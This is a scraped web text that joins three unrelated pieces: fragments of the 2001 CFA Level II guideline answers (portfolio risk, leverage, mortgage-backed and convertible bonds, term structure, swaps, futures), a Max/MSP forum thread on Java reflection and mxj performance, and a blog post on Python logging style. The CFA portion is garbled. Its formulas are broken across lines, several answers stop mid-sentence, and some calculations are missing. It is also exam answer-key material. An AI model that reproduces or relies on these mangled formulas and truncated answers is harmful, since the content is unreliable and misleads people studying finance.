2 ABC 2 + 2wOP wABC COV]1/2
COV = 0 (2.37)(0) = 0
NP = [wOP
2 OP 2 + wGS
2 GS 2 + 2wOP wGS COV] 1/2
C. Adding the risk-free government securities would cause the beta of the new portfolio
to be
lower. The new portfolio beta will be a weighted average of the individual security betas
in
the portfolio; the presence of the risk-free securities would lower that weighted average.
D. The comment is not correct. Although the standard deviations and expected returns of
the
two securities under consideration are the same, if all other factors are equal.
E. i. Grace clearly expressed the sentiment that the risk of loss was more important to
her than
the opportunity for return. Using variance (or standard deviation) as a measure of risk in
her case has a serious limitation because it does not distinguish between positive and
negative price movements.
ii. Two alternative risk measures that could be used instead of variance are:
Range of Returns, which considers the highest and lowest expected returns in the
future
period, with a larger range being a sign of greater variability and therefore of greater risk;
Semivariance, which can be used to measure expected deviations of returns below the
mean or some other benchmark, e.g., zero.
Either measure would potentially be superior to variance for Grace. Range of returns
would help to highlight the full spectrum of risk she is assuming, especially the downside
portion of the range about which she is so concerned. Semivariance would also be
effective, because it implicitly assumes that the investor wants to minimize the likelihood
of returns falling below some target rate; in Grace.s case, the target rate would be set at
zero (to protect against negative returns).
2001 Level II Guideline Answers
Morning Section . Page 19
LEVEL II, QUESTION 9
Reading References:
1. .The Financing Decision,. Ch. 6, including Appendix, Analysis for Financial
Management,
5th or 6th edition, Robert C. Higgins (Irwin, 1998 or 2000)
2. .General Principles of Credit Analysis,. Level II, Ch. 9, Fixed Income Analysis
for the
Chartered Financial Analyst Program, Frank J. Fabozzi, (Frank J. Fabozzi
Associates, 2000)
3. An Example of How to Use and Compute Effective Duration and
Effective Convexity, Gerald
W. Buetow, Jr., Robert R. Johnson, and Donald L. Tuttle (AIMR, 1999)
4. .The Analysis and Valuation of Bonds,. Ch. 16, pp. 525-579, Investment
Analysis and
Portfolio Management, 5th edition, Frank K. Reilly and Keith C. Brown (Dryden,
1997)
Purpose:
To test the candidate.s: 1) ability to evaluate the use and effects of leverage, and 2)
understanding of the relationship between leverage and credit quality.
Guideline Answer:
A. Interest expense increases $4.25 million because only $50 million of the $100 million
capital
investment is funded with debt at an interest rate of 8.50 percent ($50 million × 0.085 =
$4.25
million). The other $50 million comes from the sale of new equity. The new equity
causes
outstanding shares to increase by 2 million ($50 million / $25 per share). The completed
pro
forma is as follows:
$108,675
15,250
93,425
28,027.50
$65,397.50
14,000
$4.67
B. i. Buckner.s Cash Flow from Operations-to-Total Debt is less than desired (0.44 vs.
0.50)
and Total Debt-to-Total Capital is greater than desired (0.54 vs. 0.50), both of which
would no longer satisfy LightStreet.s credit quality standards.
ii. If Deven is correct, the yield on Buckner.s outstanding bonds would increase 20 basis
points (bps); each of the two factors in (i) above would contribute 10 bps to the increase
in yield. Because the outstanding bonds have a modified duration of 6.50 years, their
price is expected to decline by 1.3 percent as a result of the deteriorating credit quality:
Reading Reference:
Fixed Income Analysis for the Chartered Financial Analyst Program,
Frank J. Fabozzi (Frank J.
Fabozzi Associates, 2000)
A. .Mortgage-Backed Securities,. Level II, Ch. 3
B. .Valuing Mortgage-Backed and Asset-Backed Securities,. Level II, Ch. 5
Purpose:
To test the candidate.s: 1) understanding of prepayment risk, and 2) ability to use the
OAS
concept to evaluate asset-backed securities.
Guideline Answer:
A. The prepayment risk associated with declining interest rates is contraction risk: The
upside
price potential is compressed because of accelerating prepayments, and the cash flows
must
be reinvested at lower rates. The average life of the pass-through shortens.
The prepayment risk associated with rising interest rates is extension risk: The price
decline
is exacerbated because of slowing prepayments. The average life of the pass-through
lengthens.
2001 Level II Guideline Answers
Morning Section . Page 23
In this case, Tranche I appears to be the least expensive on a relative value basis because,
for
the same duration, it carries a higher option adjusted spread (108 basis points) and lower
option cost (28 basis points). That is,
Purpose:
To test the candidate.s: 1) understanding of the risk-return characteristics of bonds with
embedded options, and 2) ability to calculate various valuation measures for a convertible
bond.
Guideline Answer:
A. i. Conversion value of a convertible bond is the value of the security if it is
converted
immediately. That is,
= market price of the common stock × conversion ratio
= $40 × 22
= $880
ii. Market conversion price is the price that an investor effectively pays for the common
stock if the convertible bond is purchased.
= market price of the convertible bond / conversion ratio
= $1,050 / 22
= $47.7273 ˜ $47.73
2001 Level II Guideline Answers
Morning Section . Page 25
iii. Premium payback period is the period of time that it takes the investor to recover the
premium paid for the convertible bond. Because the investor generally receives higher
coupon interest from the convertible bond than would be received from the common
stock dividends (based on the number of shares equal to the conversion ratio), the period
of time to recover the premium can be determined.
Premium payback period = conversion premium per share / income differential per share
Conversion premium/share = $47.7273 . $40 = $7.7273
Income differential/share = ($1,000 × 6.5%) / 22 . $1.20 = $2.9545 . 1.20 = $1.7545
Premium payback period = $7.7273 / $1.7545 = 4.4043 ˜ 4.40 years
Change
Determine whether the
value will Increase,
Decrease, or
Remain Unchanged
(Circle One)
Justify your response with one reason
An increase in
stock price
volatility
Increase
Decrease
Reading Reference:
1. .The Term Structure and the Volatility of Interest Rates,. Level II, Ch. 1 Fixed
Income
Analysis for the Chartered Financial Analyst Program, Frank J. Fabozzi
(Frank J. Fabozzi
Associates, 2000)
2. .The Analysis and Valuation of Bonds,. Ch. 16, pp. 525-579, Investment
Analysis and
Portfolio Management, 5th edition, Frank K. Reilly and Keith C. Brown (Dryden,
1997)
Purpose:
To test the candidate.s: 1) understanding of different theories of the term structure of
interest
rates, and 2) ability to evaluate the effects of term structure changes on fixed income
securities.
Guideline Answer:
A. The government yield curve will steepen with the yields for longer maturities
increasing and
the yields for shorter maturities decreasing. According to Preferred Habitat Theory,
yields at
the long end of the curve will increase because of the increased supply of longer maturity
debt and the reluctance of investors to move into this sector without adequate
compensation.
Similarly, short rates will decline because of the decreased supply of short-term debt and
the
reluctance of investors to leave this sector.
2001 Level II Guideline Answers
Morning Section . Page 27
B. This question may be answered based on either the Fabozzi reading or the Reilly and
Brown
reading. Fabbozzi solves the problem using Key Rate Duration and Reilly and Brown use
Modified Duration. Both solutions are presented below:
ii. Strategy II
% . MV15yr = –15.00 × (0.25%) = –3.75%
% . MVStrategy II = 1.0 × (–3.75%) = –3.75%
Modified Duration
i. Strategy I
% . MV5yr = .4.83 × (.0.75%) = 3.6225%
% . MV25yr = .23.81 × (0.50%) = .11.9050%
% . MVStrategy I = 0.5 × (3.6225%) + 0.5 × (.11.9050%) = .4.1413%
ii. Strategy II
% . MV15yr = –14.35 × (0.25%) = –3.5875%
% . MVStrategy II = 1.0 × (–3.5875%) = –3.5875%
Reading Reference:
.The Swaps Market: Introduction,. Ch. 20, pp. 608.625 and 632.643, Futures, Options
&
Swaps, 3rd edition, Robert W. Kolb (Blackwell, 1999)
Purpose:
To test the candidate.s: 1) understanding of a fixed-for-fixed currency swap, and 2)
ability to
evaluate the effect of a swap on a company.s borrowing costs.
Guideline Answer:
A. World would assume both counterparty risk and currency risk.
Counterparty risk is the risk that Bishop.s swap.s
maturity.
Reading Reference:
Futures, Options & Swaps, 3rd edition, Robert W. Kolb (Blackwell, 1999)
A. .Futures Prices,. Ch. 3, pp.43-76
B. .Stock Index Futures: Introduction,. Ch. 7, pp. 202-212
Purpose:
To test the candidate.s understanding of and ability to use the cost-of-carry model in
evaluating
futures positions.
Guideline Answer:
A. According to the cost-of-carry rule, the futures price must equal the spot price plus
the cost of
carrying the spot commodity forward to the delivery date of the futures contract.
F0,6 = 185.00 (1 +
2
06 . 0 )
F0,6 = 190.55
Cash Inflows:
Buy 1 contract of TOBEC stock index futures (December contract)
Sell the index spot at 185.00 × $100 = $18,500
Invest the proceeds at the risk-free rate for six months (until the expiration of the six-
month contract)
$18,500 × (1 +
2
06 . 0 ) = $19,055 | https://www.scribd.com/document/389571595/Shivendra-CFA-Sample-Question-doc | CC-MAIN-2019-35 | refinedweb | 18,971 | 55.44 |
Five Myths about Managed Code
CLR Team
My name is Immo Landwerth and I was a Program Manager intern this year in the CLR team. In this blog post I am not going to showcase any of the fantastic features that will ship with .NET 4.0 – my colleagues in the CLR team know them much better and already did a fabulous job discussing them here, over there and on Channel 9.
Instead I want to discuss the following five myths about managed code and in particular about the CLR:
· Managed code is always JIT compiled
· Generic co- and contra variance are new in .NET 4.0
· Everything is an object
· .NET only supports statically typed languages
· Microsoft is not using Managed Code
Myth Five – Managed code is always JIT compiled
Having a JIT compiler has many advantages because a lot of things are becoming much easier when a JIT compiler is available:
1. On-the-fly code generation (System.Reflection.Emit) is much easier because you only have to target one virtual machine architecture (IL) instead all the processor architectures the runtime supports (such as x86 and x64).
2. To some degree it solves the fragile base class library problem. That means we can share class definitions across modules without having the problem that changes such as adding fields or adding virtual methods crashes dependent code.
3. The working set can be improved because the JIT only compiles methods that are actually executed.
4. Theoretically, you could take situational facts into consideration, such as which processor-architecture is actually used (e.g. is it SSE2 capable), the application usage patterns etc. and optimize differently for them.
However, JIT compilation also has downsides such as:
1. It takes time. That means JIT compilation always has to trade-off time vs. code quality.
2. The code is stored on private pages so the compiled code is not shared across processes.
Therefore we created a tool called NGEN that allows you to pre-create native images during the setup. You could call this ahead-of-time compilation (as opposed to just-in-time). Certain special conditions left aside (such as some hosting scenarios or profiling), the runtime will now pick up the native images instead of JIT-compiling the code.
Why did we not allow you to pre-create the native images during build time and let you ship the native images directly? Well, because we then run into the fragile base class library problem mentioned above. In that case, your native images would get invalid every time the .NET Framework is updated. Today we solve this problem by re-running NGEN on the customer’s machine when the framework is serviced. In .NET Framework 4 we ship a new feature called targeted patching, that allows us for method-body only changes to minimize or to even to fully avoid recompilation. For more details about NGEN in general see here and for more details about NGEN in .NET Framework 4 see here.
Even if you are not using NGEN for you application code: for desktop CLR applications all the assemblies that are part of the .NET Framework itself are not JIT compiled – instead the runtime will bind to the native images. So even in these cases only your application code will be JIT compiled and therefore both ahead-of-time as well as just-in-time technologies are used simultaneously. Thus, stating that all code is JITted is simply wrong.
Myth Four – Generic co- and contra variance are new in .NET 4.0
The short answer is ‘no’. The longer answer is ‘well, sort of’.
But I am getting ahead of myself. Let’s first see what co- and contravariance actually means. Generic covariance allows you to call a method that takes an IEnumerable<Shape> with an IEnumerable<Circle> (if Circle is derived from Shape). This is useful if Shape contains, e.g. a method that allows you to compute the area. This way you can write a method that computes the area for any collection of shapes. Contravariance on the other hand allows you to call a method that takes an IComparer<Circle> with an IComparer<Shape>. This is handy if someone wants to compare circles and you already have created a general comparer for any shape (this works because if your comparer knows how to compare two instances of Shape it certainly is also able to compare two instances of Circle).
The support for co- and contra variance has always been in the CLR since generics came up in the .NET Framework 2.0. However, as Rick Byers pointed out you would have to use ILASM for creating covariant and contravariant type definitions:
In IL, covariant type parameters are indicated by a ‘+’, and contravariant type parameters are indicated by a ‘-‘ (non-variant type parameters are the default, and can be used anywhere).
What has been added in the .NET 4.0 release is language support for C# and Visual Basic. For example, the following uses the C# syntax (in and out modifiers for the generic type declaration) to create some covariant and contra variant types:
Myth Three – Everything is an object
“Wait a minute – this is the number one programming promise everyone was making about .NET!” you might say now. Yes, and yet it is false. Many .NET or C# books make this mistake in one form or the other. “Everything is an object”. Although we believe there is a lot of value in simplifying things for didactic reasons (and hence many authors just claim it that way) we would like to take this opportunity to tell you “sorry, it is not completely true”.
Before we discuss this issue we should first define what the sentence “everything is an object” is supposed to mean. The interpretation we will use here is this:
Every type is derived from a single root (System.Object). This means, that every value can be implicitly casted to System.Object. More precisely, this means that every value is representable as an instance of System.Object.
So why is this not true for the CLR? The counter example is a whole class of types that are not derived from System.Object: pointers (such as int*). So you cannot pass a pointer to a method that takes an object. In addition you cannot call the ToString or GetHashCode methods on a pointer.
We could also use a different interpretation of “everything is an object” such as:
Every type is derived from a single root (System.Object). This means, that every value is an object at all times.
Why is this different? Simple values (i.e.. values that have types derived from System.ValueType) are not objects by the definition of an object (they lack identity). But every value can be casted implicitly to System.Object (because System.ValueType is derived from System.Object). However, in that case an object instance that contains the value is created. This process is called boxing. The resulting object instance (the “box”, not to be confused with Don Box) has indeed a notion of identity (which is in particular also true for Don Box).
As you can see, the CLR uses the first interpretation and yet it is still not completely true as pointers do not derive from System.Object.
Myth Two – .NET only supports statically typed languages
It is true that the CLR uses a static type system. But this does not necessarily mean that it is only suited for programming languages that use a static type system. At the end, the programming language is implemented using the CLR but it is not identical with the CLR. So do not be fooled by the fact that the type system and mechanics of C# almost map directly to first class CLR-concepts. In fact, there are many concepts in C# that the CLR is not aware of:
1. Namespaces. As far as the CLR is concerned namespaces do not even exist. They are just implemented as type prefixes separated by dots (so instead of saying ‘the class Console is contained in the namespace System’ the CLR would just say ‘there is a class called System.Console’).
2. Iterators. The CLR does not provide any support for it. All the magic is done by the compiler (if you want to know, the compiler turns your method into a new type that internally uses a state-machine to track the current point of execution. Details can be found here).
3. Lambdas. They are just syntactic sugar. For the runtime these are just delegates, which in turn can also be considered syntactic sugar. In fact, a delegate is nothing more than a class derived from System.MulticastDelegate that provides an Invoke, BeginInvoke and EndInvoke method with the appropriate parameters.
Please note that this list is not complete. Instead it is only used to show you that even C# has to implement itself on top of the CLR and hence it is not a 1:1 mapping of the concepts the runtime provides. What does this have to do with static typing vs. dynamic typing? The answer is simply: you can implement a dynamically typed system on top of a statically typed system.
If you know see a huge business opportunity here, we have to disappoint you. Some smart people already had the same idea. This effort is called the Dynamic Language Runtime, or DLR for short. If you are like me then you immediately think of native code when someone mentions the term ‘runtime’. However, the DLR is completely implemented in C# and is just a class library that can be used by programming languages to implement dynamic systems on top of the CLR. The DLR shares the fundamental design principle of the CLR, i.e. it provides a platform for more than one language. That means you can share IronPython objects with IronRuby objects because they are implemented with the same underlying runtime (the DLR).
With .NET 4.0 the DLR ships as part of the box. So while .NET has first-class support for statically typed languages through the CLR it also provides first-class support for dynamically typed languages through the DLR.
Myth One – Microsoft is not using Managed Code
We often hear this (“Office and Windows are still not built on top of managed code!”) when customers ask about performance and future investments of Microsoft in managed code. The reasoning goes like this:
Since Microsoft is not implementing Windows and Office in managed code that means that it must be significantly flawed/runs much slower than native code and therefore their long term strategy will still be C++. This in turn means that we should not use managed code either.
In fact Microsoft has a huge investment in managed code (although it is still true that Office and Windows are not implemented in managed code). However, there are a bunch of products that are significantly (if not completely) implemented in managed code:
1. Windows components, such as
a. PowerShell
b. System Center
2. Office components, such as
a. Exchange
b. SharePoint/Office Server
3. Developer Tools, such as
a. Visual Studio and Visual Studio Team System
b. Expression
4. Dynamics
This list if by far not complete but it should be large enough to convince you that we are in fact ‘eating our own dog food’.
The reason that not all products are written in managed is not only related to performance. Sometimes the wins of re-implementing working native code in managed code do not outweigh its costs. On the other hand, there are still scenarios in which managed code simply cannot be used today (such as building the CLR itself or the debugger).
However, we will not deny that there are scenarios in which we cannot compete with the performance of native code today. But this does not mean that we have given up on this. In fact, projects like Singularity should show you that we are really very ambitious about redefining the limits of the managed world.
The last thing to keep in mind is that manually optimized assembler code is also faster than plain C-code. But this does not mean that all operating systems are completely written in assembler.
Thus our vision is more like this: native code where it makes sense, managed code where it makes sense with the bigger portion being managed. | https://devblogs.microsoft.com/dotnet/five-myths-about-managed-code-2-2/ | CC-MAIN-2021-49 | refinedweb | 2,067 | 63.9 |
Have you met your new favorite LDAP directory, OpenDS?
Oh, you haven't?
Well, dude. Let me make some introductions.
Introducing the first stable release of the OpenDS Project,
OpenDS 1.0.0!
You've got an awesome package with this one, folks. OpenDS promises:
OpenDS is an open source LDAP directory written in - you guessed it - 100% Java.
- Maximum, extensible interoperability with LDAP client apps
- Directory-related extras, such as directory proxy, virtual directory, namespace distribution and data synchronization
- Ability to embed the server in other Java apps
What's really cool is that, with the Java WebStart installer Quick Start, you can have the OpenDS server configured, up and kickin' in less than 3 minutes!
Lightspeed Java action? Sweet.
But, y'know, I may be a tad biased ;] Check it out for yourself!
Learn a little more about it at the OpenDS Wiki,
or download OpenDS 1.0.0 right now!
- Duke | http://blogs.sun.com/duke/entry/have_you_met_your_new | crawl-002 | refinedweb | 154 | 66.54 |
Does not check for local auth entries in keyring if couchdb.html is present and parseable.
Bug #668409 reported by Roman Yepishev on 2010-10-29
This bug affects 4 people
Bug Description
STR:
1. Open seahorse, remove all desktopcouch tokens (simulate almost fresh start)
2. Stop desktopcouch service, start desktopcouch service.
3. Re-open seahorse
Expected results:
2 new entries for DesktopCouch auth
Actual results:
Np new entries.
Reason:
class _Configuration(
def __init__(self, ctx):
...
try:
...
return
...
# code to add couchdb entries to keyring
Workaround:
remove ~/.local/
I believe couchdb should definitely check for keyring items presense.
Joshua Hoover (joshuahoover) on 2010-11-11
Joshua Hoover (joshuahoover) on 2010-11-12
Joshua Hoover (joshuahoover) on 2012-10-15
Joshua Hoover (joshuahoover) on 2012-11-01
In Oneiric this causes the thunderbird to show the following error message:
There was a problem opening the address book "Ubuntu One" - the message returned was: Cannot open book: Could not create DesktopcouchSession object.
The workaround is to remove ~/.local/
share/desktop- couch/couchdb. html and restart desktopcouch- service | https://bugs.launchpad.net/desktopcouch/+bug/668409 | CC-MAIN-2017-13 | refinedweb | 175 | 67.45 |
give some idea for installed tomcat version 5 i have already tomcat 4
how to call jsp from flex
how to call jsp from flex hi,
i want to know that how can i call a FLEX from JSP.
. A good Example will be appreciated
Diff ways to call a EJB from Servlet, JSP - Java Interview Questions
Diff ways to call a EJB from Servlet, JSP How can I call EJB from Servlet or JSP
Hi
Hi I want import txt fayl java.please say me...
Hi,
Please clarify your problem!
Thanks
how do i make a phone call from my app without quitting my application
how do i make a phone call from my app without quitting my application hi,
I am working on creating a call application, i am making a call from my... quits , i want my application to go to background and resume on call end ...please
call from java - JavaMail
call from java Hi,
how i will call servlet from java..
plz its urgent..
Thanks
Narendra Hi Narendra,
You can use the java.net package to call a servlet from the java code
Hi.. - Struts
Hi..
Hi Friends,
I am new in hibernate please tell me.....if i am using hibernet with struts any database pkg is required or not.....without... me Hi Soniya,
I am sending you a link. I hope that, this link
UIWebView call javascript function
UIWebView call javascript function Hi,
I am developing web browser for iPhone and iPhone devices. I want to call the java script in my html page from UIWebView. Please let's know how to call JavaScript function from objective c
hi
online multiple choice examination hi i am developing online multiple choice examination for that i want to store questions,four options,correct answer in a xml file using jsp or java?can any one help me?
Please..
hi.. I want upload the image using jsp. When i browse the file then pass that file to another jsp it was going on perfect. But when i read...);
for(int i=0;i<arr.length-1;i++) {
newstr=newstr
Hi... - Struts
Hi... Hi,
If i am using hibernet with struts then require... of this installation Hi friend,
Hibernate is Object-Oriented mapping tool... more information,tutorials and examples on Struts with Hibernate visit
Hi
Hi The thing is I tried this by seeing this code itself.But I;m facing a problem with the code.Please help me in solving me the issue.
HTTP Status... an internal error () that prevented it from fulfilling this request.
exception
conference call
conference call hi
am a java beginner I want to develop a simple conference call system over a LAN can u please enlighten me on the basics that I have to do and kno first
Hi.. - Struts
Hi.. Hi,
I am new in struts please help me what data write in this file ans necessary also...
struts-tiles.tld,struts-beans.tld,struts........its very urgent Hi Soniya,
I am sending you a link. This link
call frame - Java Beginners
call frame dear java,
I want to ask something about call frame to another frame and back to first frame.
I have FrameA and FrameB. In frameA...);
} Hi friend,
I am sending you a running code. I hope - EJB
ejb how can i run a simple ejb hello application.please give me the detailed procedure. Hi Friend,
Please visit the following links: - form fields but it couldn't work can you fix what mistakes i have done</p>...
}//execute
}//class
struts-config.xml
<struts
I want detail information about switchaction? - Struts
I want detail information about switch action? What is switch action in Java? I want detail information about SwitchAction
Ejb Module
}
/**
* This is the action called from the Struts framework.
* @param mapping...Ejb Module Respected Sir/Mam
I m using jdk1.5 and jboss4.0.2
Here... Administrator
*/
public class sunLoginAction extends Action {
/** Creates a
same thing i want but from db..
same thing i want but from db..
same thing i want but from db
getting null value in action from ajax call
getting null value in action from ajax call Getting null value from ajax call in action (FirstList.java)... first list is loading correctly. Need...-default">
...
<action name="StudentRegister" class | http://roseindia.net/tutorialhelp/comment/5224 | CC-MAIN-2014-10 | refinedweb | 715 | 74.19 |
(newbie) java reflection pb
Emmanuel Jourdan
Feb 09 2006 | 5:13 pm
Emmanuel Jourdan
Feb 09 2006 | 5:30 pm
Emmanuel Jourdan
Feb 09 2006 | 5:54 pm
I just found it also. It works like a charm.
Thanks for the explanations. ej
projects
Feb 09 2006 | 6:23 pm
Hi Emmanuel,
Glad you solved your problem. Since it seems like you are doing this for speed reasons, I thought I would mention that I've read that the reflection API is very slow. You may want to benchmark these three different solutions:
1. the reflection solution you've already got working, 2. the if / else switching code you were trying to avoid, 3. the interface design pattern. Your interface would look something like this:
public interface ListOperator { public float[] operate(float a[], float b[]); }
and the addition class would look something like this:
public class ListAddition implements ListOperator { public float[] operate(float a[], float b[]) { ..... } }
and then in your MaxObject's constructor you could create an instance of the operator requested:
ListOperator myListOperator;
public simpleOp(Atom[] args) { declareIO(2,1); myListOperator = new ListAddition(); }
and call it like so in your float method:
public void inlet(float f[]) { if (getInlet() == 1) b = f; else { a = f;
outlet(0, myListOperator.operate(a,b)); }
This is the standard Java design pattern for this type of problem and I suspect it will be the fastest.
Ben
Emmanuel Jourdan
Feb 09 2006 | 6:54 pm
Hi Ben,
Thanks for the suggestions. I'll try to test the different versions soon. But, to be sure I understand correctly, with the interface solution, I still need a "big" if/else to do the List operator choice, right?
if (op.equals("+")) myListOperator = new ListAddition(); else if (op.equals("-")) myListOperator = new ListSoustraction();
Best, ej
projects
Feb 09 2006 | 6:59 pm
> Thanks for the suggestions. I'll try to test the different versions > soon. But, to be sure I understand correctly, with the interface > solution, I still need a "big" if/else to do the List operator > choice, right?
yes, but just in the constructor, not in the method that handles incoming lists.
Another place to look for ideas of how you might set up your code is the ListProcessor stuff I made for the initial Max 4.5 release.
Ben
topher lafata
Feb 09 2006 | 7:15 pm
I also was just reading some stuff that faster reflection is possible using the sun.misc.Unsafe class. This class is pretty interesting and lives up to its name! Topher
projects
Feb 09 2006 | 8:10 pm
> I'll look at it more slowly. Just one thing about this package, I use > a lot, is there any possibility to rename list.sum and list.delta in > list.Sum and list.Delta. There's just two classes with the first > letter un lowercase.
Yeah, sorry about that. Can't rename them anymore, since they could be used in other people's patches, but feel free to rename your local copies. :)
Ben
topher lafata
Feb 09 2006 | 8:41 pm
i am pretty sure you would have to rename and recompile if you take that route. toph
projects
Feb 09 2006 | 10:27 pm
> i am pretty sure you would have to rename and recompile if you take > that route.
Yes, and change the constructor code to be capitalized. I am so used to Eclipse, which would not only rename and modify the code for that class appropriately, it would also look through all the projects in your workspace to rename the class anywhere else it was used. The ability to refactor as easily as that is a big reason I like developing in Java.
Ben
Emmanuel Jourdan
Feb 10 2006 | 2:35 pm
projects
Feb 10 2006 | 4:30 pm
> On the list operator problem, I made the different versions (with if, > with reflection, with interface). >
> > The performances (measured in Max) are quite the same (the interface > solution is generally a little bit faster). Is there any better > strategy to evaluate the speed of the java code?
Yes, there is something very important here to understand. When you are testing a piece of code for speed it is important to isolate it from as much other code as possible. In the test patch that you set up, the reason the three Java classes were so close in execution time is that the test time was completely dominated by the slow boundary crossing between Java and C. In other words, it's very important to avoid all inlet and outlet calls when testing various pieces of Java code against one another.
I've attached a new lop-tests.zip. I added an "iterations" attribute to each class, I added a calculeResultat() method to each class that calculates the result but doesn't output it, and I added an iterate() method that uses a for loop to call the calculeResultat() method iterations times. I modified the patch so that the same lists were sent to all three Java objects, and then the iterate method is called on all three.
To give you an idea of the difference in speed between internal Java calculations and the boundary crossing of inlet and outlet calls, with your old method 5 iterations were taking about 210 ms on my computer. With my new method, 60000 iterations take 254 ms using reflection, 247 ms using if statements, and only 212 ms using the Interface design pattern. So it looks like the Interface design pattern is significantly faster.
But on the other hand - and this is probably the most valuable thing to keep in mind when working with Java for small utility objects like this - in the context of a patch, the execution time of this object will be completely dominated by the input/output boundary crossing between Java and C. So unless you're doing a LOT of math in response to input messages, it's really not worth the time to highly optimize your Java code, because you probably won't notice the difference anyway. For example, according to this test using the Interface design pattern instead of Reflection will save you 0.7 MICROSECONDS every time you want to multiply some lists together.
To make the most of your Max programming time, write Java code that works and is easy to read.
> The problem with the interface solution is that > you get a lot a class files.
Yeah, I know, this is an unfortunate. One way to deal with this is to bundle class files into a JAR file.
Ben
topher lafata
Feb 10 2006 | 6:23.
topher
Emmanuel Jourdan
Feb 10 2006 | 6:39 pm
projects
Feb 10 2006 | 9:56.
Well actually it's not as bad as I thought. :) I took another look at Emmanuel's patch and classes. There is an important thing that can change to improve the performance by a lot.
inlet(float[]) and inlet(int[]) are optimized and are faster than inlet(Atom[]). I just tested it out, and this small change reduced the time taken to process an inlet call by almost 65%. In other words, according to my unscientific test inlet(Atom[]) is three times slower than inlet(float[]) and inlet(int[]).
With this trick in place, performance is pretty good. The object takes in two lists, processes, and sends out a list in somewhere between 20 and 60 microseconds. That includes all the surrounding C objects doing their timing work.
Ben
ps. outlet(float[]) and outlet(int[]) are similarly optimized over outlet(Atom[])
topher lafata
Feb 10 2006 | 10:00 pm
Not really much documentation on this one.
in the console:
javap sun.misc.Unsafe
topher
topher lafata
Feb 10 2006 | 10:15 pm
Cool Ben. The inlet stuff explains some other behavior someone was telling me about!
> ps. outlet(float[]) and outlet(int[]) are similarly optimized over > outlet(Atom[])
as are outlet(String msg, float[]), outlet(String msg, int[])!
Toph
kawkhins
Feb 11 2006 | 9:34 am
Hi,
> inlet(float[]) and inlet(int[]) are optimized and are faster than > inlet(Atom[]). I just tested it out, and this small change reduced
does the measurements exclude the time for creating Atom[] and int[] ? because creating an array of atom of int seams longer than creating an int array.
regards, chris
projects
Feb 11 2006 | 5:37 pm
> does the measurements exclude the time for creating Atom[] and int[] ? > because creating an array of atom of int seams longer than creating an > int array.
Well yes, because the test was comparing the performance of inlet calls. So it is faster for the mxj C code to create an array of ints or floats than it is for the code to create an array of Atoms.
Ben
Emmanuel Jourdan
Feb 11 2006 | 6:06 pm
projects
Feb 11 2006 | 6:40 pm
Hi,
> You mean list(float[] something), don't you?
Yes, sorry.
> By the way, I though list method could > only accept atoms, as suggest the MaxObject.html.
Thanks for mentioning this - I see that MaxObject was not updated the way it should have been when the optimization for list(float[]) and list(int[]) was added. I'll address this shortly.
Ben
Forums
Java | https://cycling74.com/forums/newbie-java-reflection-pb/ | CC-MAIN-2017-39 | refinedweb | 1,538 | 71.04 |
- Issued:
- 2018-05-17
- Updated:
- 2018-05-17
RHBA-2018:1603 -.)
Changes to the openstack-neutron component:
- Previously, when an interface was removed from a router, the metadata proxy for the network was not updated even though isolated metadata was enabled on the DHCP agent. As a result, instances were not able to fetch metadata if they are on the network no longer connected to the router. This fix updates the metadata proxy so when a router interface is removed, instances are still able to fetch metadata from the DHCP namespace. (BZ#1540452)22972 - One or more additional pools are created when creating a load balancer with two pools. Error when trying to delete the loadbalancer
- BZ - 1540452 - neutron-ns-metadata-proxy disappeared
- BZ - 1542065 - [Backport to RHSOP 10] Auth token information missing from requests with no args Edit
- BZ - 1545939 - neutron lbaas commands take a long time to complete
- BZ - 1560698 - In newton , neutron-lbaas adds --connection-limit value only in the frontend
CVEs
(none)
References
(none)
Red Hat OpenStack 10
The Red Hat security contact is [email protected]. More contact details at. | https://access.redhat.com/errata/RHBA-2018:1603 | CC-MAIN-2022-05 | refinedweb | 185 | 55.47 |
#include <Path.h>
Inheritance diagram for Track::Path:
Definition at line 43 of file Path.h.
Draw the object if it is visible.
Reimplemented from Track::Drawable.
Definition at line 439 of file Path.cpp.
Draw the object.
Called indirectly by draw(const OcclusionTester &) const when it is on the screen, but can also be called manually if view bounds are not known.
Implements Track::Drawable.
Definition at line 415 of file Path.cpp.
Get the Axis aligned bounding box of the object.
The object is contained entierly within this region.
Implements Track::AABBBounded.
Definition at line 466 of file Path.cpp.
Generated at Mon Sep 6 00:41:18 2010 by Doxygen version 1.4.7 for Racer version svn335. | http://racer.sourceforge.net/classTrack_1_1Path.html | CC-MAIN-2017-22 | refinedweb | 121 | 62.44 |
13 January 2011 18:04 [Source: ICIS news]
PRAGUE (ICIS)--An allegation of market manipulation aimed at blocking an attempt by Hungarian group MOL to obtain a majority stakeholding in ?xml:namespace>
Oil, gas and petrochemical group MOL made the claim in December after its buyout price offer to small shareholders of oil company INA was suddenly outstripped by INA's share price on the Zagreb stock exchange.
AZTN, which probed the trading in the stock at the request of MOL, said the price surge was driven by demand for the shares from Croatian pension funds and that all their purchases were within market rules.
MOL owns 47.15% of INA, while the Croatian state holds 44.84%.
MOL's buyout bid was aimed at the remaining 8.01% of INA shares, which remain in free float, with the intention of gaining majority control of the company. However, the Croatian government has opposed the move.
The offer made to the small shareholders by MOL expires on Friday.
MOL wants to exploit refining and petrochemical feedstock potential that it sees in IN | http://www.icis.com/Articles/2011/01/13/9425843/agency-rejects-mol-allegation-of-market-manipulation-on-ina-shares.html | CC-MAIN-2014-41 | refinedweb | 181 | 62.38 |
I see three conflicting styles of log formatting in most of the code I come across. Basically:
import logging logging = logging.getLogger(__name__) logger.info("%s went %s wrong", 42, 'very') logger.info("{} went {} wrong".format(42, 'very')) logger.info("%s went %s wrong" % (42, 'very'))
I looked at the official PEP 282 and at the official docs.
With the help of someone’s stackoverflow question I think I understand it now.
Use the first version of the three examples. So:
The actual log message with the old, well-known
%s (and
%d,
%f, etc) string formatting indicators.
As many extra arguments as you have
%s-thingies in your string.
Don’t use the second and third example, as both of them format the string before it gets passed to the logger. So even if the log message doesn’t need to be actually logged somewhere, the full string gets created.
The first example only gets passed a string and some extra arguments and only turns it into a real full string for in your logfile if it actually gets logged. So if you only display WARN level and higher, your DEBUG messages don’t need to be calculated.
There is no easy way to use the first example with
%s.
{}instead of
So: use the
logger.info("%s went %s wrong", 42, 'very') form.
(Unless someone corrects me,): | https://reinout.vanrees.org/weblog/2015/06/05/logging-formatting.html | CC-MAIN-2022-21 | refinedweb | 229 | 67.96 |
